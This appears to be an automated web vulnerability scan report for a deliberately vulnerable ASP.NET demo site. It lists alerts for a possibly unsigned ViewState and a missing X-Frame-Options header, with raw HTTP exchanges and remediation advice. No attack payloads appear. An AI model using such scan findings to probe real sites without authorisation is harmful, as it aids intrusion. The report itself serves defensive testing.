align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. 
It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Solution
Ensure the MAC is set for all pages on this website.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (456 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Content-Length: 10985
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (10985 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 30486
Response body (30486 bytes)
Solution
Ensure the MAC is set for all pages on this website.
Risk=Medium, Confidence=Medium (26)
http://testaspnet.vulnweb.com (26)
X-Frame-Options Header Not Set (26)
GET http://testaspnet.vulnweb.com
Alert tags
Alert description
X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (211 bytes)
GET http://testaspnet.vulnweb.com HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Request body (0 bytes)
Response
Status line and header section (296 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:16 GMT
Content-Length: 13912
Response body (13912 bytes)
Parameter
X-Frame-Options
Solution
Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY). Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/
Alert tags
Alert description
X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (212 bytes)
GET http://testaspnet.vulnweb.com/ HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Request body (0 bytes)
Response
Status line and header section (296 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:15 GMT
Content-Length: 13912
Response body (13912 bytes)
Parameter
X-Frame-Options
Solution
Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY). Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/about.aspx
Alert tags
Alert description
X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:17 GMT
Content-Length: 14467
Response body (14467 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 
value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" 
href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. 
In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" 
title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td 
align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Parameter: X-Frame-Options
Solution: Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ads/def.html
Alert description: X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (355 bytes)
GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (246 bytes)
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 24 May 2019 07:50:37 GMT
Accept-Ranges: bytes
ETag: "eb6cf45f512d51:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 488
Response body (488 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title></title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"> <meta name="ProgId" content="VisualStudio.HTML"> <meta name="Originator" content="Microsoft Visual Studio .NET 7.1"> </head> <body> <P align="center"><STRONG>Is your website hackable?<BR> check with<BR> <IMG src="acunetix.gif"><BR> Web Vulnerability Scanner</STRONG></P> </body> </html>
Parameter: X-Frame-Options
Solution: Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
Alert description: X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 13707
Response body (13707 bytes)
Parameter: X-Frame-Options
Solution: Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
Alert description: X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 14245
Response body (14245 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 
value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/pbihq93nLJJrCcGURk6iWNCIK+A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD 